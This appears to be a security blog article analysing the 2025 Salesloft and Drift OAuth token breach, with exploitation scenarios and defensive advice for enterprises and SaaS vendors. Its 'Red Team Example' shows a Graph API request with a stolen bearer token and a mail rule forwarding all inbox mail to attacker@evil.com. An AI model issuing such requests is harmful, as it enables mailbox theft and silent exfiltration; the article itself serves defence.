Google has warned that the recent Salesloft OAuth breach, attributed to threat group UNC6395, is not limited to Salesforce as initially reported. Instead, the attack affects all third-party SaaS integrations connected to Salesloft via OAuth, massively expanding the potential impact radius.
Between August 8–18, 2025, attackers stole and abused OAuth tokens from Salesloft and Drift, enabling persistent unauthorized access to customer CRMs, email systems, and communications platforms. The campaign reflects a growing pattern: attackers are shifting from password theft to OAuth token hijacking, targeting the trust chains that underpin modern SaaS ecosystems.
Technical Anatomy of the Breach
Attack Vector: OAuth Token Hijacking
- OAuth tokens allow SaaS apps (like Salesloft, Drift, Salesforce) to connect without requiring repeated password entry.
- Once compromised, tokens give attackers the same API-level access as legitimate apps.
- Tokens are often long-lived, making them valuable for persistence.
Red Team Example:
An attacker who steals a valid OAuth token can:
GET https://graph.microsoft.com/v1.0/me/messages
Authorization: Bearer <stolen_token>
→ Fetch all user emails without needing MFA or passwords.
Expanding Beyond Salesforce
- Salesforce initially disabled Salesloft integrations due to suspicious API activity.
- Google later confirmed that any platform connected to Salesloft via OAuth — including Google Workspace, Microsoft services, CRMs, and messaging platforms — may have been exposed.
Drift Exploitation Connection
- The same campaign also exploited Drift (a communications SaaS), during the same August 8–18 window.
- This points to a coordinated supply chain exploitation campaign targeting SaaS ecosystems through OAuth trust chains.
Real-World Exploitation Scenarios
Scenario 1: Business Email Compromise via OAuth Tokens
- Attacker uses stolen OAuth token from Salesloft → Gains API access to Gmail/Outlook mailboxes.
- They set up inbox forwarding rules:
POST /v1.0/me/mailFolders/inbox/messageRules
{ "displayName": "ForwardAll", "actions": {"forwardTo": ["attacker@evil.com"]} }
→ Silent exfiltration of all customer emails.
Scenario 2: CRM Data Exfiltration
- Using OAuth token tied to Salesforce integration, attacker queries customer pipeline data.
- Data stolen includes leads, contracts, and client contact lists → sold on dark markets or used for spear-phishing.
Scenario 3: Persistence in the Cloud
- Even if a user changes passwords, OAuth tokens remain valid until explicitly revoked.
- Attacker maintains hidden access long after the initial breach.
Lessons from the Incident
- OAuth = the new attack surface. Tokens grant API access equivalent to full login sessions but are rarely monitored.
- Supply chain blind spots. Integrations like Salesloft connect multiple SaaS platforms together, creating cascading risk.
- Detection gap. Many enterprises log user logins but fail to monitor API-based OAuth access.
Defensive Recommendations
For Enterprises
- Audit Integrations — Review all SaaS OAuth connections to Salesloft and Drift.
- Revoke & Rotate Tokens — Immediately revoke existing OAuth tokens from Aug 8–18 and force re-authentication.
- Monitor API Activity — Flag anomalous API calls (e.g., mass email exports, CRM data pulls).
- Short-Lived Tokens — Configure OAuth tokens with limited lifetimes and refresh policies.
- Conditional Access Policies — Require device posture or IP-based restrictions for token use.
For SaaS Vendors
- Built-In Token Expiry — Enforce short-lived tokens with continuous validation.
- Granular Scopes — Minimize token permissions (principle of least privilege).
- Revocation APIs — Provide customers with easy tools to revoke OAuth grants.
- Behavioral Analytics — Detect when tokens are being used in ways inconsistent with normal app behavior.
The Salesloft OAuth breach highlights the fragility of today’s SaaS trust chains. By stealing a single token, attackers bypass MFA, passwords, and user awareness — directly accessing enterprise data across multiple connected platforms.
UNC6395’s campaign proves that OAuth token hijacking is the new credential theft. Without better governance, monitoring, and architecture, OAuth breaches could become the next SolarWinds-class supply chain problem for SaaS.
Information security specialist, currently working as risk infrastructure specialist & investigator.
15 years of experience in risk and control process, security audit support, business continuity design and support, workgroup management and information security standards.